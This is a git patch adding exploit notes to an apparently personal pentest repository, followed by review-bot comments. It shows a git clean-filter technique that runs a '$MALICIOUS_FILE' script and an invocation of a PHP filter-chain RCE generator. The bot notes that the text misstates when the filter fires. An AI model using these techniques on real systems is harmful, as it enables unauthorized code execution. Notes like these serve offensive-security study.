From cc02384f373220cd24e0a088161a9a3535c54595 Mon Sep 17 00:00:00 2001 From: whx Date: Fri, 3 Mar 2023 19:04:59 +0100 Subject: [PATCH] added git attributes exploit possibility --- Exploits/Git/Git Attributes.md | 14 ++++++++++++++ Exploits/References.md | 4 +++- Exploits/Web/PHP Filer Chain.md | 7 +++++++ 3 files changed, 24 insertions(+), 1 deletion(-) create mode 100644 Exploits/Git/Git Attributes.md create mode 100644 Exploits/Web/PHP Filer Chain.md diff --git a/Exploits/Git/Git Attributes.md b/Exploits/Git/Git Attributes.md new file mode 100644 index 0000000..68e5782 --- /dev/null +++ b/Exploits/Git/Git Attributes.md @@ -0,0 +1,14 @@ +# Git Attributes + +[Git Attributes]( https://www.git-scm.com/docs/gitattributes) can be used to introduce scripts modifying files before pushing. That means the you can prepare a scripts for example linting by filtetype, and call it via attributes afterwards. +Therefore, you need to create an attributes file at `.git/info/attributes`. Insert something that makes sense, e.g. +```sh +echo "*.py filter=indent" > .git/info/attributes +``` + +reference the file as the filter via +```sh +git config filter.indent.clean /dev/shm/$MALICIOUS_FILE +``` + +Push to origin afterwards to trigger the filter file diff --git a/Exploits/References.md b/Exploits/References.md index 77d2b52..78a072a 100644 --- a/Exploits/References.md +++ b/Exploits/References.md @@ -3,11 +3,13 @@ [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings.git) ## Recover git Repositories + [Internetwache's gitTools](https://github.com/internetwache/GitTools.git) ## Web -[Padbuster - padding Oracle Attacks](https://github.com/AonCyberLabs/PadBuster.git) +* [Padbuster - padding Oracle Attacks](https://github.com/AonCyberLabs/PadBuster.git) +* [PHP Filter Chain Generator](https://github.com/synacktiv/php_filter_chain_generator.git) ### PHP 
diff --git a/Exploits/Web/PHP Filer Chain.md b/Exploits/Web/PHP Filer Chain.md new file mode 100644 index 0000000..44ddc49 --- /dev/null +++ b/Exploits/Web/PHP Filer Chain.md @@ -0,0 +1,7 @@ +# PHP Filter Chain Generator + +* [Get RCEs without uploading by chaining filters](https://github.com/synacktiv/php_filter_chain_generator) +* Or by uploading a filtered file +```sh +./php_filter_chain_generator.py --chain '' +```
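Review bot: In `Exploits/Git/Git Attributes.md`, the description of when the filter runs is wrong in two places: the intro says scripts modify files "before pushing", and the last line says to push to origin to trigger the filter. A `clean` filter runs when a file is staged or checked in (for example on `git add`), not on `git push`, so both sentences should be corrected. While editing, fix the typos in the intro ("the you", "a scripts", "filtetype") and drop the stray space in `]( https://www.git-scm.com/docs/gitattributes)`. A closing line on how to recognise this in a repository under review (an unexpected `filter.<name>.clean` entry in the git config together with a `.git/info/attributes` file) would make the page more useful.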
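Review bot: In `Exploits/References.md`, only the entries under `## Web` are turned into a bullet list, while the entries under the earlier headings (`[PayloadsAllTheThings]`, `[Internetwache's gitTools]`) stay as bare links, so the file now mixes two styles. Either convert every section to bullets or keep bare links throughout. The blank line added after `## Recover git Repositories` is likewise not added after `## Web`; apply the same spacing to every heading.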
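Review bot: The new file is named `Exploits/Web/PHP Filer Chain.md`, but its heading and the linked tool both say "PHP Filter Chain"; rename the file to `PHP Filter Chain.md` so that search and links resolve as expected. The example `--chain ''` passes an empty string with no explanation of what the argument should contain, so either describe the expected value in a sentence or point to the tool's README. The code fence also follows the bullet "Or by uploading a filtered file" without a blank line or indentation, which some Markdown renderers will not attach to the list item. Finally, the commit subject mentions only git attributes, although the patch also adds this page and edits `References.md`; consider splitting the commit or widening the subject.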